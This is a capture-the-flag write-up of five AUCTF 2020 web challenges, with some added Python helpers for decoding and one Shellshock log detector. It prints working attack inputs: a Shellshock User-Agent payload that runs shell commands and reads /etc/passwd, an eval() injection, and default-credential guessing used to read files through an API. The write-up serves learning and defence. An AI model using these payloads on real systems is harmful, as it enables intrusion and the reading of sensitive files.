AUCTF 2020 Web Writeups

Posted on 2020-04-07

https://ctftime.org/event/1020

Miyazaki Trivia | 50pt | 522/1184
Quick Maths | 50pt | 505/1184
gg no re | 50pt | 320/1184
API madness | 926pt | 85/1184
M1 Abrams | 977pt | 48/1184

The Dockerfiles were kindly published, so I’ll review the challenges alongside them.
auehc/AUCTF-2020







Miyazaki Trivia

http://challenges.auctf.com:30020
Here’s a bit of trivia for you vidya game nerds.
Author: shinigami

The first challenge is a riddle. It wants you to look for a file, and there are robots crawling the whole internet for files every day. Let’s take a look at robots.txt.

VIDEO GAME TRIVIA: What is the adage of Byrgenwerth scholars?
MAKE a GET request to this page with a header named 'answer' to submit your answer.

It was Bloodborne. As a Japanese player I know the game well, but I couldn’t get my head around the word “adage”. Googling it turned up “Fear the old blood”.

$ curl http://localhost/robots.txt -H "answer:Fear the old blood"
Master Willem was right.auctf{f3ar_z_olD3_8l0oD}

Good.







Quick Maths

http://challenges.auctf.com:30021
two plus two is four minus three that’s one quick maths
Author: shinigami

Let’s poke at it a little.

image.png

The page is PHP and passes the input to eval().
Let’s enter $flag.

image.png

That gets us the flag.

The author’s own writeup instead uses the approach of dumping all the variables. I see, so this is an educational challenge.







gg no re

http://challenges.auctf.com:30022
A junior dev built this site but we want you to test it before we send it to production.
Author: shinigami

When I looked at the source code, I found authentication.js.

image.png

Oh…

var _0x44ff = ['TWFrZSBhIEdFVCByZXF1ZXN0IHRvIC9oaWRkZW4vbmV4dHN0ZXAucGhw', 'aW5jbHVkZXM=', 'bGVuZ3Ro', 'bG9n'];

These look base64 encoded. Time for CyberChef.

image.png

Bingo. Nothing more in there, though.

$ curl -i http:/localhost/hidden/nextstep.php
HTTP/1.1 200 OK
Date: Tue, 07 Apr 2020 02:08:48 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
ROT13: Znxr n CBFG erdhrfg gb /ncv/svany.cuc
Content-Length: 15
Content-Type: text/html; charset=UTF-8

Howdy neighbor!

ROT13. CyberChef is still open.

image.png

On to the next page. It says to send a request with the flag variable set.
OK.

$ curl http://localhost/api/final.php -X POST -d "flag"
auctf{1_w@s_laZ_w1t_dis_0N3}







API madness

http://challenges.auctf.com:30023
We are building out our new API. We even have authentication built in!
Author: shinigami

image.png

OK. Let’s check /static/help.

Endpoints
/api/login - POST
/api/ftp/dir - POST
/api/ftp/get_file - POST

Params
/api/login - username, password
/ftp/dir - dir
/ftp/get_file - file

When you find an API you don’t understand, try sending it requests in various formats.
It does accept JSON, but it takes a long time to reply, and what comes back is an error.
curl http://localhost/api/login -X POST -d '{"username":"user", "password":"pass"}' -H 'Content-type: application/json'

Looking at the error response, it mentions an API endpoint that is not in the help. Hidden APIs are where the secrets tend to be, so let’s access it the way it’s written.

$ curl http://localhost/api/login_check -X POST -d '{"username":"user", "password":"pass"}' -H 'Content-type: application/json'
{
"token": null
}

Hmm, that looks like an authentication failure. I’ll try some common username/password patterns.

$ curl http://localhost/api/login_check -X POST -d '{"username":"username", "password":"password"}' -H 'Content-type: application/json'
{
"token": "bc842c31a9e54efe320d30d948be61291f3ceee4766e36ab25fa65243cd76e0e"
}

Nice. Now that we have a token, we can use it with the other APIs and fetch flag.txt.

$ curl http://localhost/api/ftp/dir -X POST -d '{"dir":".", "token":"bc842c31a9e54efe320d30d948be61291f3ceee4766e36ab25fa65243cd76e0e"}' -H 'Content-type: application/json'
{
"dir": [
".dockerenv",
"bin",
"boot",
"dev",
"etc",
"flag.txt",
"ftp_server.py",
"home",
"lib",
"lib64",
"media",
"mnt",
"opt",
"proc",
"root",
"run",
"sbin",
"srv",
"startup.sh",
"sys",
"templates",
"tmp",
"usr",
"var",
"web_server.py"
],
"status": "OK"
}
$ curl http://localhost/api/ftp/get_file -X POST -d '{"file":"flag.txt", "token":"bc842c31a9e54efe320d30d948be61291f3ceee4766e36ab25fa65243cd76e0e"}' -H 'Content-type: application/json'
{
"file_data": "YXVjdGZ7MHdAc3BfNnJvSzNOX0B1dGh9Cg==\n",
"status": "OK"
}

The rest is a job for CyberChef.
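Added example, not code from the writeup: a Python script that pulls the obfuscator’s string table out of the authentication.js line shown in gg no re and base64-decodes it, decodes the ROT13 response header from /hidden/nextstep.php, and decodes the file_data field that /api/ftp/get_file returned in API madness. Every input is a value printed on this page; the function names are my own.

```python
import base64
import codecs
import re

# The one line of authentication.js the writeup shows (gg no re)
AUTH_JS = ("var _0x44ff = ['TWFrZSBhIEdFVCByZXF1ZXN0IHRvIC9oaWRkZW4vbmV4dHN0ZXAucGhw', "
           "'aW5jbHVkZXM=', 'bGVuZ3Ro', 'bG9n'];")
# The ROT13 response header from /hidden/nextstep.php (gg no re)
ROT13_HEADER = "ROT13: Znxr n CBFG erdhrfg gb /ncv/svany.cuc"
# The file_data field returned by /api/ftp/get_file (API madness)
FILE_DATA = "YXVjdGZ7MHdAc3BfNnJvSzNOX0B1dGh9Cg==\n"

STRING_TABLE_RE = re.compile(r"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\]\s*;", re.S)


def extract_string_table(js_source):
    """Find the obfuscator's `var _0x.... = [...]` string table and
    base64-decode each entry. Returns (table_name, decoded_strings).
    Entries that are not valid base64 are kept as-is, since some
    obfuscators mix plain and encoded strings in one table."""
    m = STRING_TABLE_RE.search(js_source)
    if not m:
        raise ValueError("no _0x string table found")
    decoded = []
    for entry in re.findall(r"'([^']*)'", m.group(2)):
        try:
            decoded.append(base64.b64decode(entry, validate=True).decode())
        except (ValueError, UnicodeDecodeError):
            decoded.append(entry)
    return m.group(1), decoded


def decode_rot13_header(header_line):
    """Take 'ROT13: <text>' and return the rotated text."""
    name, _, value = header_line.partition(":")
    if name.strip().upper() != "ROT13":
        raise ValueError("not a ROT13 header")
    return codecs.decode(value.strip(), "rot_13")


def decode_file_data(b64_field):
    """Decode the base64 file_data field; the API leaves a trailing newline in it."""
    return base64.b64decode(b64_field.strip()).decode()


if __name__ == "__main__":
    print(extract_string_table(AUTH_JS))
    print(decode_rot13_header(ROT13_HEADER))
    print(repr(decode_file_data(FILE_DATA)))
```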







M1 Abrams

http://challenges.auctf.com:30024
We built up this server, and our security team seems pretty mad about it. See if you can find out why.
Author: shinigami

No clues, so I’ll try gobuster.
It finds a cgi-bin directory.
Let’s run gobuster against that too.

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/scriptlet (Status: 200)

scriptlet responds with 200. Let’s take a look at it.

$ curl -i http://localhost/cgi-bin/scriptlet
HTTP/1.1 200 OK
Date: Wed, 08 Apr 2020 13:30:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 55
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)

What is this? Googling it: this is the output of the id command.
Since the CGI script runs shell commands, let’s try Shellshock.

$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Yes.
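Added example from the defender’s side, not part of the writeup: a Python detector that scans Apache combined-format access log lines for the Shellshock function-definition prefix in the User-Agent or Referer field, which mod_cgi exports to the script as HTTP_USER_AGENT and HTTP_REFERER. The log lines are constructed for the example; the malicious one carries the exact User-Agent the writeup sent.

```python
import re

# Apache "combined" log format:
#   ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Vulnerable bash only acted on environment values beginning with "() {";
# the regex tolerates extra whitespace so sloppy variants are caught too.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# Constructed sample log (not from the page); the second line carries the
# User-Agent the writeup used against /cgi-bin/scriptlet.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Apr/2020:13:30:53 +0000] "GET /cgi-bin/scriptlet HTTP/1.1" 200 55 "-" "curl/7.64.0"
203.0.113.7 - - [08/Apr/2020:13:31:10 +0000] "GET /cgi-bin/scriptlet HTTP/1.1" 200 812 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
198.51.100.2 - - [08/Apr/2020:13:32:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def find_shellshock_requests(log_text):
    """Return (ip, request, field, value) for every parsable line whose
    User-Agent or Referer begins with a bash function definition."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m[field]):
                hits.append((m["ip"], m["request"], field, m[field]))
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_requests(SAMPLE_LOG):
        print("Shellshock attempt from %s: %s (%s=%r)" % hit)
```

A CGI host patched against Shellshock still deserves this alert: a 200 with an unusual body size on the same path, as in the second constructed line, is the sign the payload was executed.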

$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'ls'"
scriptlet
$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'ls /'"
bin
boot
dev
etc
flag.file
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

flag.file!

$ curl http://localhost/cgi-bin/scriptlet -A "() { :; }; echo; echo; /bin/bash -c 'cat /flag.file'" > out
$ file out
out: ASCII text
$ cat out

1f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c9303634
8c0fce30f08ecf358eaf72484989ace502005a5da5461b000000

Feed this to CyberChef and it gives you the flag.
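Added example, not from the writeup: the hex dump above starts with the gzip magic 1f 8b and has the FNAME flag set (original filename flag.txt), so a Python script can parse the member header and gunzip it offline instead of going through CyberChef. The dump is the one printed on the page; the function names are my own.

```python
import gzip
import struct

# Hex dump returned by the challenge, as printed above (two lines joined)
HEX_DUMP = (
    "1f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c9303634"
    "8c0fce30f08ecf358eaf72484989ace502005a5da5461b000000"
)

FHCRC, FEXTRA, FNAME, FCOMMENT = 0x02, 0x04, 0x08, 0x10


def parse_gzip_header(raw):
    """Parse the fixed gzip member header (RFC 1952) and the optional
    fields that precede the deflate data. Returns a dict of fields."""
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream (bad magic)")
    cm, flg, mtime, xfl, os_id = struct.unpack("<BBIBB", raw[2:10])
    info = {"method": cm, "flags": flg, "mtime": mtime, "os": os_id}
    pos = 10
    if flg & FEXTRA:
        xlen = struct.unpack("<H", raw[pos:pos + 2])[0]
        pos += 2 + xlen
    if flg & FNAME:  # zero-terminated original filename
        end = raw.index(b"\x00", pos)
        info["filename"] = raw[pos:end].decode("latin-1")
        pos = end + 1
    if flg & FCOMMENT:
        pos = raw.index(b"\x00", pos) + 1
    if flg & FHCRC:
        pos += 2
    info["data_offset"] = pos
    return info


def recover_flag(hex_dump):
    """Hex-decode the dump, read its header, and gunzip it.
    gzip.decompress checks the CRC32 and ISIZE trailer, so a
    corrupted dump raises instead of returning garbage."""
    raw = bytes.fromhex(hex_dump)
    header = parse_gzip_header(raw)
    return header, gzip.decompress(raw).decode()


if __name__ == "__main__":
    hdr, text = recover_flag(HEX_DUMP)
    print(hdr["filename"], repr(text))
```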